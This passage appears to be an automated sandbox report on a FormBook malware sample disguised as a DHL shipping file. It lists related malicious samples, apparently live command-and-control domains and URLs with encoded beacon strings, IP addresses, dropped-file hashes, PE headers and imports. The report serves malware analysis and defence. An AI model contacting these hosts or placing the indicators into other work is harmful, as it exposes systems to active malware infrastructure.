                                                                                          Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                          N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          www.3xfootball.comDHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          POWERLINE-AS-APPOWERLINEDATACENTERHKDHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.215.72.110
                                                                                          http://93287.mobiGet hashmaliciousUnknownBrowse
                                                                                          • 154.203.26.164
                                                                                          la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                          • 156.253.231.231
                                                                                          loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                          • 156.227.181.218
                                                                                          2.elfGet hashmaliciousUnknownBrowse
                                                                                          • 156.242.243.23
                                                                                          sh4.elfGet hashmaliciousUnknownBrowse
                                                                                          • 45.202.220.151
                                                                                          armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                          • 154.201.227.218
                                                                                          rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 160.124.155.145
                                                                                          rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 154.89.221.223
                                                                                          elitebotnet.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 156.242.21.125
                                                                                          REGISTER-ASITDHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 195.110.124.133
                                                                                          Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • 195.110.124.133
                                                                                          DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 195.110.124.133
                                                                                          ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 195.110.124.133
                                                                                          SEDO-ASDEDHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          236236236.elfGet hashmaliciousUnknownBrowse
                                                                                          • 91.195.240.94
                                                                                          DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.121297215059106
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\user\AppData\Local\Temp\aut1CC0.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):270848
                                                                                          Entropy (8bit):7.993222502483216
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:lwSNghIc0omqX2fXDyg04ZKISzWP7vVhmx1U51sVItQne:li90lbXDyT4ZKISzWD771sVIane
                                                                                          MD5:630CC920541B9544B4AB80EEDE64BD77
                                                                                          SHA1:8AA023221C064E5229FC31F95122EE56A9D8CBEF
                                                                                          SHA-256:D868E48718295F6C6C4D97C65583F4F6188B5977590CD32B6DBB06C6C5B3D305
                                                                                          SHA-512:EC2F71225360BB6A7D2225473941BD577BBC75DEEF8865CCAC2D80CBF97D59CA23011A884753490952F29E244DBA503FDEEA65ED23946D8C039C7C87C6CA49E8
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:...f.64ON..N...n.TO....LF...GWK34RWTL4V64ONXZZGWK34RWTL4V6.ONXTE.YK.=.v.Mx..`''+z*58,AU?w7-Z8Y@o,=z(29kZZr....;YP*`UWPcWK34RWT55_../).g: .vSS.M...lVS.T..{7,.....pT1.f&-0g: .K34RWTL4.s4O.Y[Z.?.l4RWTL4V6.OLYQ[LWK#0RWTL4V64O.MZZGGK34rSTL4.64_NXZXGWM34RWTL4P64ONXZZGwO34PWTL4V66O..ZZWWK#4RWT\4V&4ONXZZWWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34Ry )L"64O.W^ZGGK34BSTL$V64ONXZZGWK34RwTLTV64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONX

                                                                                          C:\Users\user\AppData\Local\Temp\turbinate

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):270848
                                                                                          Entropy (8bit):7.993222502483216
                                                                                          Encrypted:true
                                                                                          SSDEEP:6144:lwSNghIc0omqX2fXDyg04ZKISzWP7vVhmx1U51sVItQne:li90lbXDyT4ZKISzWD771sVIane
                                                                                          MD5:630CC920541B9544B4AB80EEDE64BD77
                                                                                          SHA1:8AA023221C064E5229FC31F95122EE56A9D8CBEF
                                                                                          SHA-256:D868E48718295F6C6C4D97C65583F4F6188B5977590CD32B6DBB06C6C5B3D305
                                                                                          SHA-512:EC2F71225360BB6A7D2225473941BD577BBC75DEEF8865CCAC2D80CBF97D59CA23011A884753490952F29E244DBA503FDEEA65ED23946D8C039C7C87C6CA49E8
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:...f.64ON..N...n.TO....LF...GWK34RWTL4V64ONXZZGWK34RWTL4V6.ONXTE.YK.=.v.Mx..`''+z*58,AU?w7-Z8Y@o,=z(29kZZr....;YP*`UWPcWK34RWT55_../).g: .vSS.M...lVS.T..{7,.....pT1.f&-0g: .K34RWTL4.s4O.Y[Z.?.l4RWTL4V6.OLYQ[LWK#0RWTL4V64O.MZZGGK34rSTL4.64_NXZXGWM34RWTL4P64ONXZZGwO34PWTL4V66O..ZZWWK#4RWT\4V&4ONXZZWWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34Ry )L"64O.W^ZGGK34BSTL$V64ONXZZGWK34RwTLTV64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONXZZGWK34RWTL4V64ONX

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.139385154790074
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:DHL 0737-12182024.exe
                                                                                          File size:1'254'400 bytes
                                                                                          MD5:ec3ba2f9b2d0b8236ac14326f17c2512
                                                                                          SHA1:83868d22c1f3437a6ebc5cda29ad0d8cb75c43a6
                                                                                          SHA256:15bb7ea4eaf34d92908626f1f1898e3bdc5a19fd086df4808a590c00c7285d74
                                                                                          SHA512:464dc47cca0d3eced6c57bb65d1b8a2c11dcc28103ba451aac355113e118ee4594ea1fa5c68abf7a0bc3aa85c6fc397d1939e7ef332d9a6937565d91a1239963
                                                                                          SSDEEP:24576:1qDEvCTbMWu7rQYlBQcBiT6rprG8ais1ZIVWiroV11CzhT6XtWI:1TvC/MTQYxsWR7ai7W3V12dc
                                                                                          TLSH:4145C00273C1D022FF9B92334B5AF6515BBC69260123E61F13981DBABE705B1563E7A3
                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                                          File Icon

                                                                                          Icon Hash:aaf3e3e3938382a0

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x420577
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67635C90 [Wed Dec 18 23:36:48 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          call 00007FAC491C5463h
                                                                                          jmp 00007FAC491C4D6Fh
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          push dword ptr [ebp+08h]
                                                                                          mov esi, ecx
                                                                                          call 00007FAC491C4F4Dh
                                                                                          mov dword ptr [esi], 0049FDF0h
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                          mov eax, ecx
                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                          mov dword ptr [ecx+04h], 0049FDF8h
                                                                                          mov dword ptr [ecx], 0049FDF0h
                                                                                          ret
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          push dword ptr [ebp+08h]
                                                                                          mov esi, ecx
                                                                                          call 00007FAC491C4F1Ah
                                                                                          mov dword ptr [esi], 0049FE0Ch
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                          mov eax, ecx
                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                          mov dword ptr [ecx+04h], 0049FE14h
                                                                                          mov dword ptr [ecx], 0049FE0Ch
                                                                                          ret
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          mov esi, ecx
                                                                                          lea eax, dword ptr [esi+04h]
                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                          and dword ptr [eax], 00000000h
                                                                                          and dword ptr [eax+04h], 00000000h
                                                                                          push eax
                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                          add eax, 04h
                                                                                          push eax
                                                                                          call 00007FAC491C7B0Dh
                                                                                          pop ecx
                                                                                          pop ecx
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          lea eax, dword ptr [ecx+04h]
                                                                                          mov dword ptr [ecx], 0049FDD0h
                                                                                          push eax
                                                                                          call 00007FAC491C7B58h
                                                                                          pop ecx
                                                                                          ret
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          mov esi, ecx
                                                                                          lea eax, dword ptr [esi+04h]
                                                                                          mov dword ptr [esi], 0049FDD0h
                                                                                          push eax
                                                                                          call 00007FAC491C7B41h
                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                          pop ecx

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5b8cc.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1300000x7594.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0xd40000x5b8cc0x5ba0097987a321615054496f8d9523e853b4eFalse0.9277903308321964data7.894938427826124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x1300000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                          RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                          RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                          RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                          RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                          RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                          RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                          RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                          RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                          RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                          RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                          RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                                          RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                          RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                                          RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                          RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                          RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                          RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                          RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                          RT_RCDATA0xdc7b80x52b91data1.000327595009931
                                                                                          RT_GROUP_ICON0x12f34c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                          RT_GROUP_ICON0x12f3c40x14dataEnglishGreat Britain1.25
                                                                                          RT_GROUP_ICON0x12f3d80x14dataEnglishGreat Britain1.15
                                                                                          RT_GROUP_ICON0x12f3ec0x14dataEnglishGreat Britain1.25
                                                                                          RT_VERSION0x12f4000xdcdataEnglishGreat Britain0.6181818181818182
                                                                                          RT_MANIFEST0x12f4dc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                          Imports

                                                                                          DLLImport
                                                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                          UxTheme.dllIsThemeActive
                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
